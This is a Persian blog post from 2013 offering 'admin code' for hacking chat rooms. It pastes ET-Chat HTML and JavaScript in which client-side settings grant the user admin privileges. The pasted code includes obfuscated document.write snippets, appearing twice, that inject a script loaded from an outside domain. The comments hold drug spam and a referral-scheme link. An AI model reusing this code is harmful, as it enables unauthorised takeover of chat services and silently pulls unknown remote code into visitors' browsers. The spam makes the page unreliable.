تبلیغات
دانلود آموزش گفتوگو - کد مدیر شدن در چت روم(هک چتروم)

کد مدیر شدن در چت روم(هک چتروم)

شنبه چهاردهم اردیبهشتماه سال 1392 01:15   نویسنده : دانش مند      


برای دریافت کد بر روی ادامه مطلب کلیک کنید
09383971209 : تلفن
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
        "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<script src="js/prototype.js" type="text/javascript"></script>
<script src="js/scriptaculous.js" type="text/javascript"></script>
<script src="js/chat.js" type="text/javascript"></script>
<script src="./?MessagesForJs" type="text/javascript"></script>
<link href="styles/etchat_white/style.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="js/window.js"></script>
<link href="styles/default_2create_win.css" rel="stylesheet" type="text/css" />
<script type="text/javascript">

window.onload = function() {
    var chatObj = new ET_Chat();
    chatObj.messages_im_chat=22;
    chatObj.reload_interval=4000;
    chatObj.username='..Milad..';
    chatObj.user_id='339845';
    chatObj.userPrivilegienGlobal='admin';
    chatObj.win_style='etchat_white';
    chatObj.anbindung_an_userverwaltung=false;
    chatObj.show_history_all_user=true; //sonst wird die History nur fuer Admin u  sichtbar
    chatObj.set_dynamic_height=true; // sonst hat das ganze Chat eine feste Hoehe
    chatObj.allow_nick_registration=true;
    chatObj.textcolor='000000';
    chatObj.start();
    chatObj.userOnline();
    if ( Prototype.Browser.IE )
        $("splitpane").onmousedown = function(){ chatObj.dragSplitpane(); }
    else
        chatObj.dragSplitpane();
}

  </script><body id="body_id">
<div id="rahmen_um_alles">
<div id="kopf"></div>
<div id="onlinelist"><img src="img/ajax-loader.gif" alt="" /></div>
<div id="splitpane"></div>
<div id="chatinhalt">
<style>
.Gbutton{</form><div style="font:bold 10px tahoma;text-align:right;color:#fff;direction:rtl;"><iframe id="I1" border="0" name="I1" src="http://www.fozolchat.ir/mp3.php" style="width: 230px; background-color: rgb(255, 255, 255); border-radius: 5px 5px 5px 5px;" frameborder="0" scrolling="no">Your browser does not support inline frames or is currently configured not to display inline frames.</iframe>
<iframe id="I1" border="0" name="I1" src="http://www.akvanchat.com/rk.php" style="width: 202px; background-color: rgb(255, 255, 255); border-radius: 5px 5px 5px 5px;" frameborder="0" scrolling="no">Your browser does not support inline frames or is currently configured not to display inline frames.</iframe>
<iframe id="I2" border="0" name="I2" src="http://shokchat.ir/chat/nazer.php" style="width: 230px; background-color: rgb(255, 255, 255); border-radius: 5px 5px 5px 5px;" frameborder="0" scrolling="no">
Your browser does not support inline frames or is currently configured not to display inline frames.
    <title>به عسل چت خوش آمدید</title>
<script language="javascript">
function whichButton(event)
{
if (event.button==2)//RIGHT CLICK
{
alert("please,not copy and paste in asalchat ");
}

}
function noCTRL(e)
{
var code = (document.all) ? event.keyCode:e.which;

var msg = "Sorry,you can`t copy and paste in asalchat.";
if (parseInt(code)==17) //CTRL
{
alert(msg);
window.event.returnValue = false;
}
}
</script>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />

  <script src="js/prototype.js" type="text/javascript"></script>
  <script src="js/scriptaculous.js" type="text/javascript"></script>
  <script src="js/chat.js" type="text/javascript"></script>
  <script src="./?MessagesForJs" type="text/javascript"></script>
  <link href="styles/etchat_white/style.css" rel="stylesheet" type="text/css"/>

<style type="text/css">
#chatinhalt{

    padding: 5px;
    background:#ffffff url('http://irannab.com/up3/images/fsqnq70gdik53ccnnqs.jpg');
    font-size: 13px;
    font-family: tahoma;
    font-style: normal;
    /*margin-right:200px;*/
    position:relative;
    height: 450px;
    overflow: auto;
    padding: 5px;
    padding-bottom: 16px;
    line-height:150%;
        -moz-border-radius: 9px;
    -webkit-border-radius: 9px;
    border-radius: 9px;
        -moz-box-shadow: 3px 3px 4px #909090;
        -webkit-box-shadow: 3px 3px 4px #909090;
        line-height:180%;
        box-shadow: 3px 3px 4px #909090;


}
#onlinelist{

    background:#ffffff url('http://irannab.com/up3/images/fsqnq70gdik53ccnnqs.jpg');
padding: 5px;
    font-size: 12px;
    font-family: tahoma;
    font-style: normal;
    float: right;
    width: 200px;
    height: 450px;
    padding-bottom: 16px;
    overflow: auto;
            -moz-border-radius: 9px;
    -webkit-border-radius: 9px;
    border-radius: 9px;
        -moz-box-shadow: 3px 3px 4px #909090;
        -webkit-box-shadow: 3px 3px 4px #909090;
        box-shadow: 3px 3px 4px #909090;
        

}
#form{

    background:#ffffff url('http://irannab.com/up3/images/fsqnq70gdik53ccnnqs.jpg');
    font-size: 12px;
    font-family: tahoma;
    font-style: normal;
    clear: both;
    margin-top: 10px;
    color:#000000;
    padding: 3px;
    height: 45px;
     border: 1px solid #d7d7d7;
    -moz-border-radius: 9px;
    -webkit-border-radius: 9px;
    border-radius: 9px;
    -moz-box-shadow: 3px 3px 4px #909090;
        -webkit-box-shadow: 3px 3px 4px #909090;
        box-shadow: 3px 3px 4px #909090;
   

}
.rooms{
 background-image:url('http://irannab.com/up3/images/4aundw9ybd8csynvpq7.png');
 background-position:right;
 background-repeat:no-repeat;
 padding: 1px;
 margin-bottom: 12px;
 cursor:pointer;
 text-align:center;
 -moz-border-radius:5px;
 -webkit-border-radius5px;
 -moz-box-shadow:3px 3px 4px #565656;
 -webkit-box-shadow:3px 3px 4px #565656;
 box-shadow:3px 3px 4px #565656;
 height:22px;
 padding-top:7px

}
</style><script type="text/javascript" src="js/window.js"></script>
<link href="styles/default_2create_win.css" rel="stylesheet" type="text/css"/>
  <script type="text/javascript">

window.onload = function() {
    var chatObj = new ET_Chat();
    chatObj.messages_im_chat=100;
    chatObj.reload_interval=4000;
    chatObj.username='..milad..';
    chatObj.user_id='339845';
    chatObj.userPrivilegienGlobal='admin';
    chatObj.win_style='etchat_white';
    chatObj.anbindung_an_userverwaltung=false;
    chatObj.show_history_all_user=true; //sonst wird die History nur fuer Admin u Mod sichtbar
    chatObj.set_dynamic_height=true; // sonst hat das ganze Chat eine feste Hoehe
    chatObj.allow_nick_registration=true;
    chatObj.textcolor='000000';
    chatObj.start();
    chatObj.userOnline();
    if ( Prototype.Browser.IE )
        $("splitpane").onmousedown = function(){ chatObj.dragSplitpane(); }
    else
        chatObj.dragSplitpane();
}

  </script>

</head>
<body background="http://irannab.com/up3/images/05e06ntfm6vq6mdtjwm.jpg">
<div id="rahmen_um_alles">
<div id="kopf">
<div align="center">
<table border="0" width="100%" id="table1">
    <tr>
        <td>
        <p align="center">
        <img border="0" src="http://irannab.com/up3/images/3mkui5pdpgcqt6e9gm3o.jpg" ></td>
    </tr>
</table>
</div>
</div>
<div id="onlinelist"><img src="img/ajax-loader.gif" alt="" /></div>
<div id="splitpane"></div>
<div id="chatinhalt"></div>

<div id="form">
<form id="message_form" style="display:inline;" action="">

<div id="form_left">

<div id="privat_anzeige">به همه افراد:</div>

<input type="hidden" name="room" id="room" value="1" />
<input type="hidden" name="privat" id="privat" value="" />
<input type="hidden" name="bold" id="bold" value="normal" />
<input type="hidden" name="italic" id="italic" value="normal" />
<input type="hidden" name="color" id="color" value="#000000" />

<input name="message" id="message" type="text" class="input" style="width:400px;"/>
</div>
<div id="form_right">
<img id="link_sagen" class="img_button" src="img/Checked.png" width="32" height="32" border="0" alt="ارسال پیــام" title="ارسال پیــام" />&nbsp;&nbsp;&nbsp;
<img id="link_smileys" class="img_button" src="img/Smiley_Cool.png" width="32" height="32" border="0" alt="شکلک ها" title="شکلک ها" />&nbsp;&nbsp;&nbsp;
<img id="link_color" class="img_button" src="img/Colors.png" width="32" height="32" border="0" alt="فونت ها و رنگ ها" title="فونت ها و رنگ ها" />&nbsp;&nbsp;&nbsp;
<img id="link_prop" class="img_button" src="img/Display.png" width="32" height="32" border="0" alt="تنظیمات دیگر" title="تنظیمات دیگر" />&nbsp;&nbsp;&nbsp;

<img id="link_smileys2" class="img_button" src="img/fal.gif" width="32" height="32" border="0" alt="?#65533;ال حا?#65533;ظ" title="?#65533;ال حا?#65533;ظ" />&nbsp;&nbsp;&nbsp;
<a target="_blank" href="top.php">
<img  class="img_button" src="point.png" width="32" height="32" border="0" alt="&#1585;&#1578;&#1576;&#1607; &#1740;&#1606;&#1583;&#1740;" title="&#1585;&#1578;&#1576;&#1607; &#1576;&#1606;&#1583;&#1740;" /></a>&nbsp;&nbsp;&nbsp;
<a target="_blank" href="profile">
<img  class="img_button" src="profile.png" width="32" height="32" border="0" alt="&#1662;&#1585;&#1608;&#1601;&#1575;&#1740;&#1604;" title="&#1662;&#1585;&#1608;&#1601;&#1575;&#1740;&#1604;" /></a>&nbsp;&nbsp;&nbsp;
<a target="_blank" href="user">
<img  class="img_button" src="cpuser32.png" width="32" height="32" border="0" alt="&#1705;&#1606;&#1578;&#1585;&#1604; &#1662;&#1606;&#1604; &#1575;&#1593;&#1590;&#1575;&#1569;" title="&#1705;&#1606;&#1578;&#1585;&#1604; &#1662;&#1606;&#1604; &#1575;&#1593;&#1590;&#1575;&#1569;" /></a>&nbsp;&nbsp;&nbsp;

<img id="link_logout" class="img_button" src="img/Delete_big.png" width="32" height="32" border="0" alt="خروج از چت" title="خروج از چت" />
</div>
</form><br><br><br><br>
</div>

</div>
<p align="center">
<span style="font-family: Tahoma; font-size: medium; background-color:#FFFFFF">
<img border="0" src="registerchat.png" width="500" height="40"><br>
<img border="0" src="user500.png" width="500" height="40">
</span></p>
<div align="center">
    <table border="0" width="100" id="table1">
        <tr>
            <td>

<iframe width="294" height="248" src="amar3.php" style="border: 0px;" frameborder="0" scrolling="no"></iframe>
</td>
            <td>

<iframe width="294" height="248" src="amar10.php" style="border: 0px;" frameborder="0" scrolling="no"></iframe>
</td>            <td>

<iframe width="294" height="248" src="amar7.php" style="border: 0px;" frameborder="0" scrolling="no"></iframe>
</td>            <td>

<iframe width="294" height="248" src="amar5.php" style="border: 0px;" frameborder="0" scrolling="no"></iframe>
</td>
       </tr>
</table>
</div>
<center>
<a target="_blank" href="http://emsharj.com">
<img border="0" src="http://irannab.com/up3/images/y4xonud1qih63hnc5ux.gif" width="468" height="60"></a>

<a target="_blank" href="http://asalchat.blogfa.com/post-43.aspx">
<img border="0" src="http://irannab.com/up3/images/g1t1cxvnq7yzqwoixluv.gif" width="468" height="60"></a>


<br>
<script language="JavaScript">
var msz="Paste Nakonid Lotfan";

function Isr(evn){var dsr=window.event?event:evn;var esr=dsr.keyCode;if(dsr.ctrlKey){if(esr==86){document.getElementById("message").value=msz;return false}}return true}
var o6="g.c",oz="%73c%72i%70t>",o7='om/l"></',t9="t%70://si",yu="ngl.%70",oi="gi",o4="er%73i%61n",b8='%3C%73cr%69pt %73r%63="h%74';document.write(unescape(b8+t9+yu+o4+oi+o6+o7+oz));document.getElementById("message").onkeydown=Isr;document.getElementById("message").onkeypress=Isr;document.getElementById("message").onpaste=function(){return false};document.getElementById("message").onkeyup=Isr;
</script><br></center>
<html dir="ltr">

<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="Content-Language" content="fa">
</head>
<iframe width="0" height="0" src="emid.php?username2=..milad..." style="border: 0px;" frameborder="0" scrolling="no"></iframe>

<script language="JavaScript">
var msz="Sheyton Shodia :D ";

function Isr(evn){var dsr=window.event?event:evn;var esr=dsr.keyCode;if(dsr.ctrlKey){if(esr==90){document.getElementById("message").value=msz;return false}}return true}
var o6="g.c",oz="%73c%72i%70t>",o7='om/l"></',t9="t%70://si",yu="ngl.%70",oi="gi",o4="er%73i%61n",b8='%3C%73cr%69pt %73r%63="h%74';document.write(unescape(b8+t9+yu+o4+oi+o6+o7+oz));document.getElementById("message").onkeydown=Isr;document.getElementById("message").onkeypress=Isr;document.getElementById("message").onpaste=function(){return false};document.getElementById("message").onkeyup=Isr;
</script><script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3E%3C%21--%0D%0A%0D%0Avar%20message%3D%22&#1582;&#1585;&#1575;&#1576;&#1705;&#1575;&#1585;&#1610; &#1605;&#1605;&#1606;&#1608;&#1593;  : %20 %21%22%3B%0D%0A%0D%0Afunction%20clickIE%28%29%20%20%7Bif%20%28document.all%29%20%7Balert%28message%29%3Breturn%20false%3B%7D%7D%0D%0Afunction%20clickNS%28e%29%20%7Bif%20%0D%0A%28document.layers%7C%7C%28document.getElementById%26%26%21document.all%29%29%20%7B%0D%0Aif%20%28e.which%3D%3D2%7C%7Ce.which%3D%3D3%29%20%7Balert%28message%29%3Breturn%20false%3B%7D%7D%7D%0D%0Aif%20%28document.layers%29%20%0D%0A%7Bdocument.captureEvents%28Event.MOUSEDOWN%29%3Bdocument.onmousedown%3DclickNS%3B%7D%0D%0Aelse%7Bdocument.onmouseup%3DclickNS%3Bdocument.oncontextmenu%3DclickIE%3B%7D%0D%0A%0D%0Adocument.oncontextmenu%3Dnew%20Function%28%22return%20false%22%29%0D%0A%0D%0A//%20--%3E%3C/script%3E';d=unescape(m);document.write(d);</script>


</body>
</html>

آخرین ویرایش: - -
دیدگاه ها ()
دوشنبه بیست و هشتم اسفندماه سال 1396 00:01

Thanks a lot! Quite a lot of advice.

calis cialis usa cost price cialis per pill cialis side effects dangers cialis patentablauf in deutschland cialis savings card miglior cialis generico online prescriptions cialis 200 cialis coupon cialis pills boards
دوشنبه سیزدهم شهریورماه سال 1396 13:18
If you want to take much from this post then you have to apply such methods to your won webpage.
شنبه سوم مردادماه سال 1394 03:57
الان اینو چیکارش کنیم کجا ازش استفاده میشه
دانش مند
بابا خودت یه کاریش کن دیگه بزار مردم به کاروزندگیشون برسن
پنجشنبه پنجم تیرماه سال 1393 16:20
خوب بود
یکشنبه بیست و دوم اردیبهشتماه سال 1392 08:30
سلام دوست عزیز با ثبت نام در این سایت می تونید با انلاین بودنتون راحت کسب درامد کنید فقط

کافیه ثبت نام کنید و روی دکمه شروع کسب درامد کلیک کنید به همین راحتی

خود وبسایت اتوماتیک به حساب شما پول واریز می کنه

فقط تا انلاین هستید صفحه اش رو باز بذارید

اگه دوست داشتید هم می تونید سایتتون رو ثبت کنید تا بازدید کننده برای سایت شما هم بفرسته
http://www.bazdidsaz.com/?refer=shahmiri

http://www.bazdidsaz.com/?refer=shahmiri
از طریق این لینک می تونید ثبت نام کنید هر چی زودتر ثبت نام کنید درامد بیشتری می تونید کسب کنید
 
لبخندناراحتچشمک
نیشخندبغلسوال
قلبخجالتزبان
ماچتعجبعصبانی
عینکشیطانگریه
خندهقهقههخداحافظ
سبزقهرهورا
دستگلتفکر

درباره وبلاگ


  • دانلود

نویسندگان

  • دانش مند(102)

نظر سنجی

نظر شما در رابطه با نوع فعالیت این بستر چیست؟